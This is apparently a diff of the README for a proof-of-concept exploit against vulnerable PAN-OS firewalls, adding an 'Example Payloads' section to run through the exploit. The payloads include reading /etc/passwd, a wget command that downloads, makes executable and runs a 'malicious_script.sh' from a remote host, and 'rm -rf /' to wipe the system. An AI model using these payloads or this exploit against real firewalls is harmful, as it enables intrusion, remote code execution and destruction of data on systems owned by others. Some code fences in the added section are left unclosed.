| skipped 23 lines |
24 | 24 | | python3 PoC.py |
25 | 25 | | |
26 | 26 | | Follow the prompts to enter the IP address of the vulnerable PAN-OS firewall and the payload to execute. |
27 | | - | Optionally, enter 'q' to quit the script. |
| 27 | + | |
| 28 | + | ## Example Payloads |
| 29 | + | |
| 30 | + | 1. List Directory Contents: |
| 31 | + | ```bash |
| 32 | + | ls -la |
| 33 | + | |
| 34 | + | 2. Print the contents of a specific file: |
| 35 | + | ```bash |
| 36 | + | cat /etc/passwd |
| 37 | + | |
| 38 | + | 3. Print the username of the current user who is logged in to the system: |
| 39 | + | ```bash |
| 40 | + | whoami |
| 41 | + | |
| 42 | + | 4. Download a file from the internet (requires wget or curl installed): |
| 43 | + | ```bash |
| 44 | + | wget http://example.com/malicious_script.sh -O /tmp/malicious_script.sh && chmod +x /tmp/malicious_script.sh && /tmp/malicious_script.sh |
| 45 | + | |
| 46 | + | 5. Be very careful with this one: |
| 47 | + | ```bash |
| 48 | + | rm -rf / |
28 | 49 | | |
29 | 50 | | ## References |
30 | 51 | | |
| skipped 5 lines |